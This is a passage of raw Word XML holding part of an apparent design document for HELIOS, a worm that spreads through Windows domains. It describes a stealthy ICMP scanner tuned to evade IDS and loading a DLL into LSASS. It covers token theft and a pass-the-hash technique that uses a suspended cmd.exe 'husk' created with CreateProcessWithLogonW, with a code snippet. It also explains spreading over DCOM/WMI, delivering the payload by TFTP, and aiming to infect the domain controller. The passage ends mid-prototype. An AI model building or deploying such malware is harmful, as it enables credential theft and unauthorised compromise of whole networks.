          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creates other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutexs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and synchronization objects (file transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If CORE is running in LSASS memory, a procedure will be called respective to the OS version. (XPSP2, Windows Vista (6.0), Windows 7(6.1)).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Start the Wrapper threads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc347394083"/>
      <w:r>
        <w:t>Network Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Once the CORE DLL is loaded into LSASS memory, and if the host machine is on a domain, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> engine will initialize the network scanner thread, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan_net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(). This thread will broadcast ICMP on the subnet. The network scanner is relatively slow to reduce network noise to deter any active IDS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Upon initialization, the network scanner will first enumerate all interfaces on the system, by checking if the MIB_IF_TYPE_ETHERNET field is set to true. Once a functioning interface is found, the network scanner thread will dump all IP addresses cached in the hosts ARP table. The multicast </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and broadcast addresses are then filtered and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pool will be populated with possible target IPs.  To discover the IP address of the primary domain controller, a hostname API is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> seeks a new target IP address, the function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_random_address_from_pool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...) is called. This function will synchronize with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan_net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() by using a CRITICAL_SECTION object. The random address is pulled from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and passed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230C15" w:rsidRDefault="00230C15" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Since the network scanner is using ICMP, the IcmpSendEcho2Ex(...) function will be used. Each packet payload is </w:t>
      </w:r>
      <w:r w:rsidR="002C468B">
        <w:t xml:space="preserve">crafted to mimic legitimate ICMP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C468B">
        <w:t>echos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C468B">
        <w:t>. Since this procedure takes time, and the target subnet may be relatively large, a risk of "loosing" an IP address written to the ARP cache is a problem. This is solved by increasing the ARP entry timeouts on the host machine. This procedure differs in each major version of the OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Every n seconds, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan_net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() thread halts sending requests and synchronizes with the CRITICAL_SECTION object in order to update any new IP addresses found. Computers that have successfully infected via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will have their IP addresses stored in a used pool, preventing retargeting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="0065380F" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc347394084"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="002C468B">
        <w:t>TM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C468B">
        <w:t xml:space="preserve"> (NetBIOS Token Manipulation Engine)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The primary attack vector in HELIOS is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or the NetBIOS Token Manipulation Engine. The engine was designed to infiltrate Windows domains by modifying internal LSA memory. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does not utilize any form of exploit technology, but instead is meant to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the architecture of Microsoft's domain authentication mechanism (NetBIOS). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>In short, when a client authenticates with a Domain Controller (DC), the NTLM hashed username and password are sent through the network. Once this procedure has been completed, an authentication token is stored on the client machine, and a copy of the token on the DC. This token allows clients to assume the identity of a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937976" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">These tokens are accumulated by any remote login (RDP, Network Logon, database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, etc). The more tokens that are available, the more likely that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be able to use them on other clients in the network. The ultimate goal is for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to acquire enough tokens to infect the Primary DC (PDC), so that it will be able to spread throughout the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C468B" w:rsidRDefault="002C468B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">These tokens are stored in lsass.exe memory, and are managed by the lsasrv.dll (LSA) library. Each token is encrypted and protected. Since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be running in the context of LSASS, it will assume SYSTEM access rights, therefore being granted no global network permissions.</w:t>
      </w:r>
      <w:r w:rsidR="00937976">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937976" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00937976" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc347394085"/>
      <w:r>
        <w:t>Hash Replay</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00937976" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00937976" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Once the HELIOS DLL is loaded into LSASS memory, it will attempt to locate all logon/session tokens in LSA memory. Essentially, each token will be tried against all machines on the network, in order to figure out which token has sufficient access credentials to infiltrate a remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009502A2" w:rsidRDefault="00937976" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">After token enumeration, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> creates a "husk", or dummy processes, acting as a DCOM surrogate. </w:t>
      </w:r>
      <w:r w:rsidR="00650278">
        <w:t>The husk process determines what the available usernames are on the system. Usually, at least one will be active, assuming the machine is inside a domain. This username will be used to create the husk process. However, the password supplied contains no real authority on the system, so the husk, if started, will fail to run under those specified credentials. Here is an example of the call:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650278" w:rsidRPr="00650278" w:rsidRDefault="00650278" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateProcessWithLogonW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>real_token.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>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 This user exists</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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eal_token.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>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 The domain is correct</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>L"dummy_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>",</w:t>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 Password is wrong</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LOGON_NETCREDENTIALS_ONLY,</w:t>
      </w:r>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004253B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Creates a new token</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NULL,</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L"C:\\windows\\system32\\cmd.exe",</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CREATE_SUSPENDED,</w:t>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 Must be suspended</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NULL,</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NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650278" w:rsidRP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&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>startup_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650278" w:rsidRDefault="00650278" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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r>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650278">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009502A2" w:rsidRDefault="009502A2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009502A2" w:rsidRDefault="009502A2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Since the husk process is started with the CREATE_SUSPENDED switch, it will not </w:t>
      </w:r>
      <w:r w:rsidR="004253B2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">fail to execute, and the token will be installed in memory regardless. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004253B2" w:rsidRDefault="004253B2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004253B2" w:rsidRDefault="004253B2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t>L"dummy_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">" string is hashed using NTLM, and is stored in LSA memory. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> performs a memory scan of process to determine where the token is located. Next, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifies the token NTLM and Session hashes, to mimic the selected target username and hash. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004253B2" w:rsidRDefault="004253B2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004253B2" w:rsidRDefault="004253B2" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Now that the husk token has successfully mimicked the target token, it attempts to communicate with the remote machine via DCOM, using the WMI subsystem. If it is successful, the </w:t>
      </w:r>
      <w:r w:rsidR="003857E8">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t>target payload is copied onto the system via TFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc347394086"/>
      <w:r>
        <w:t>Token Encryption</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The same algorithm is taken by </w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSs, but there are a few differences between</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows XP and Windows 7 token storage. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finds the encrypted tokens by searching</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">all pages with the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MEM_COMMIT and MEM_PRIVATE switches. Real tokens are found by searching for the 'Primary' signature, which must be referenced by another value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Windows XP implements a DES-X block </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with CBC cipher chaining to hide</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the presence of the token object. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LsaInitializeProtectedMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(...) generates a DES-X</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hints table, which is then stored in heap memory. Token objects are decrypted using a call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LsaEncryptMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(...), in lsasrv.dll. This function will access the hint tables</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and decrypt a block of memory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LsaEncryptMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prototype and signature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pP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void (WINAPI *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LsaEncryptMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
